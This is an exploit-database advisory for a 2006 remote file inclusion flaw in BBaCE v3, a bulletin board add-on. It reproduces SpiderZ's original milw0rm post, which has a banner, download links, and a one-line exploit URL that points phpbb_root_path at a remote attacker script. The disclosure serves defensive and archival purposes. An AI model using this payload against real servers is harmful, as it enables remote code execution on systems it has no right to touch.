BBaCE Remote File Inclusion Vulnerability

vendor:

BBaCE

by:

SpiderZ

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: BBaCE

Affected Version From: BBaCE v3

Affected Version To: BBaCE v3

Patch Exists: YES

Related CWE: N/A

CPE: a:bbace:bbace:3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

BBaCE Remote File Inclusion Vulnerability

BBaCE v3 ( Bulletin Board Ace ) is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to an unsuspecting user. The malicious URL contains a malicious script which is hosted on a remote server. When the user visits the malicious URL, the malicious script is executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# BBaCE Remote File Inclusion Vulnerability
# For: BBaCE v3 ( Bulletin Board Ace )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
-------------------------------------------------------------------------
Download: http://bbace.blogspot.com/2005/09/downloads.html
Download 2: http://www.phpbbhacks.com/download/3062
-------------------------------------------------------------------------
_________________________________________________________________________




http://site.com/[path]/includes/functions.php?phpbb_root_path=http://[Evil_script]

# milw0rm.com [2006-10-02]